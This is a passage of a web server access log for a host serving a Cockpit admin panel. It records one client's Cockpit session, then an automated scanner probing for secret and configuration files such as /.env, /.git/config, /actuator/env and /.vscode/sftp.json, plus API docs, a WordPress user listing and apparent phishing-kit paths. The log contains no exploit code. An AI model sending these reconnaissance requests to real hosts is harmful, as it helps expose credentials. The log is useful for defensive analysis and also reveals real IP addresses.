140312] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/updates.js" [Client 84.1.26.27] [Length 343921] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.css" [Client 84.1.26.27] [Length 135276] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.css" [Client 84.1.26.27] [Length 36161] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/overview.js" [Client 84.1.26.27] [Length 322234] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/manifests.js" [Client 84.1.26.27] [Length 10180] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.js" [Client 84.1.26.27] [Length 190215] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.js" [Client 84.1.26.27] [Length 178131] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:38:45 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/config" [Client 103.216.116.241] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "https://outlook.live.com/" +[29/Jan/2026:14:44:17 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 35.226.75.61] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[29/Jan/2026:14:44:17 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 35.226.75.61] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://terminal.profibot.hu" +[29/Jan/2026:15:27:51 +0000] - 101 101 - GET https terminal.profibot.hu "/cockpit/socket" [Client 84.1.26.27] [Length 608560889] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:22:45:12 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "-" "-" +[29/Jan/2026:22:45:12 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:12 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 167.71.81.114] [Length 11748] [Gzip -] [Sent-to 192.168.100.43] "-" "-" +[29/Jan/2026:22:45:13 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 167.71.81.114] [Length 11741] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:13 +0000] - - 301 - GET http terminal.profibot.hu "/server" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:14 +0000] - 200 200 - GET https terminal.profibot.hu "/server" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:14 +0000] - - 301 - GET http terminal.profibot.hu "/server-status" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:15 +0000] - 200 200 - GET https terminal.profibot.hu "/server-status" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:16 +0000] - 200 200 - GET https terminal.profibot.hu "/about" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:16 +0000] - - 301 - GET http terminal.profibot.hu "/about" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:17 +0000] - 404 404 - GET https terminal.profibot.hu "/login.action" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:17 +0000] - - 301 - GET http terminal.profibot.hu "/login.action" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:18 +0000] - 200 200 - GET https terminal.profibot.hu "/v2/_catalog" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:18 +0000] - - 301 - GET http terminal.profibot.hu "/v2/_catalog" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:18 +0000] - - 301 - GET http terminal.profibot.hu "/.DS_Store" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:19 +0000] - 404 404 - GET https terminal.profibot.hu "/.DS_Store" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:19 +0000] - - 301 - GET http terminal.profibot.hu "/.env" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:20 +0000] - 404 404 - GET https terminal.profibot.hu "/.env" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:21 +0000] - - 301 - GET http terminal.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:22 +0000] - 200 200 - GET https terminal.profibot.hu "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:23 +0000] - - 301 - GET http terminal.profibot.hu "/.git/config" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - 404 404 - GET https terminal.profibot.hu "/.git/config" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - - 301 - POST http terminal.profibot.hu "/graphql" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - - 301 - POST http terminal.profibot.hu "/api" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - - 301 - POST http terminal.profibot.hu "/api/graphql" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - - 301 - POST http terminal.profibot.hu "/graphql/api" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:24 +0000] - - 301 - POST http terminal.profibot.hu "/api/gql" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:25 +0000] - 405 405 - POST https terminal.profibot.hu "/graphql" [Client 167.71.81.114] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:25 +0000] - - 301 - GET http terminal.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:25 +0000] - 405 405 - POST https terminal.profibot.hu "/api" [Client 167.71.81.114] [Length 3244] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:25 +0000] - 405 405 - POST https terminal.profibot.hu "/api/graphql" [Client 167.71.81.114] [Length 3244] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:26 +0000] - 405 405 - POST https terminal.profibot.hu "/graphql/api" [Client 167.71.81.114] [Length 3244] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:26 +0000] - - 301 - GET http terminal.profibot.hu "/config.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:26 +0000] - 405 405 - POST https terminal.profibot.hu "/api/gql" [Client 167.71.81.114] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:26 +0000] - 200 200 - GET https terminal.profibot.hu "/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:27 +0000] - 404 404 - GET https terminal.profibot.hu "/config.json" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:28 +0000] - - 301 - GET http terminal.profibot.hu "/telescope/requests" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:28 +0000] - - 301 - GET http terminal.profibot.hu "/info.php" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:29 +0000] - - 301 - GET http terminal.profibot.hu "/actuator/env" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:29 +0000] - 200 200 - GET https terminal.profibot.hu "/telescope/requests" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:30 +0000] - 404 404 - GET https terminal.profibot.hu "/info.php" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:31 +0000] - 200 200 - GET https terminal.profibot.hu "/actuator/env" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:31 +0000] - - 301 - GET http terminal.profibot.hu "/swagger-ui.html" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:32 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/index.html" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:33 +0000] - 404 404 - GET https terminal.profibot.hu "/swagger-ui.html" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:33 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/swagger-ui.html" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:34 +0000] - 200 200 - GET https terminal.profibot.hu "/swagger/index.html" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:34 +0000] - - 301 - GET http terminal.profibot.hu "/webjars/swagger-ui/index.html" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:35 +0000] - 200 200 - GET https terminal.profibot.hu "/swagger/swagger-ui.html" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:35 +0000] - - 301 - GET http terminal.profibot.hu "/swagger.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:36 +0000] - 200 200 - GET https terminal.profibot.hu "/webjars/swagger-ui/index.html" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:36 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/v1/swagger.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:37 +0000] - 404 404 - GET https terminal.profibot.hu "/swagger.json" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:37 +0000] - - 301 - GET http terminal.profibot.hu "/v2/api-docs" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:38 +0000] - 200 200 - GET https terminal.profibot.hu "/swagger/v1/swagger.json" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:38 +0000] - - 301 - GET http terminal.profibot.hu "/v3/api-docs" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:39 +0000] - 200 200 - GET https terminal.profibot.hu "/v2/api-docs" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:39 +0000] - - 301 - GET http terminal.profibot.hu "/api-docs/swagger.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:40 +0000] - 200 200 - GET https terminal.profibot.hu "/v3/api-docs" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:40 +0000] - - 301 - GET http terminal.profibot.hu "/api/swagger.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:41 +0000] - 200 200 - GET https terminal.profibot.hu "/api-docs/swagger.json" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:41 +0000] - - 301 - GET http terminal.profibot.hu "/@vite/env" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:42 +0000] - 200 200 - GET https terminal.profibot.hu "/api/swagger.json" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:42 +0000] - - 301 - GET http terminal.profibot.hu "/.vscode/sftp.json" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:43 +0000] - 200 200 - GET https terminal.profibot.hu "/@vite/env" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:43 +0000] - - 301 - GET http terminal.profibot.hu "/?rest_route=/wp/v2/users/" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:44 +0000] - 404 404 - GET https terminal.profibot.hu "/.vscode/sftp.json" [Client 167.71.81.114] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:44 +0000] - - 301 - GET http terminal.profibot.hu "/debug/default/view?panel=config" [Client 164.92.244.132] [Length 166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:45 +0000] - 200 200 - GET https terminal.profibot.hu "/?rest_route=/wp/v2/users/" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[29/Jan/2026:22:45:46 +0000] - 200 200 - GET https terminal.profibot.hu "/debug/default/view?panel=config" [Client 167.71.81.114] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[30/Jan/2026:00:04:09 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 84.254.106.197] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:09 +0000] - 200 200 - GET https terminal.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:09 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.js" [Client 84.254.106.197] [Length 16683] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:09 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/login.css" [Client 84.254.106.197] [Length 14139] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:09 +0000] - 200 200 - GET https terminal.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:10 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/branding.css" [Client 84.254.106.197] [Length 518] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:00:04:10 +0000] - 200 200 - GET https terminal.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[30/Jan/2026:03:56:54 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 149.57.180.155] [Length 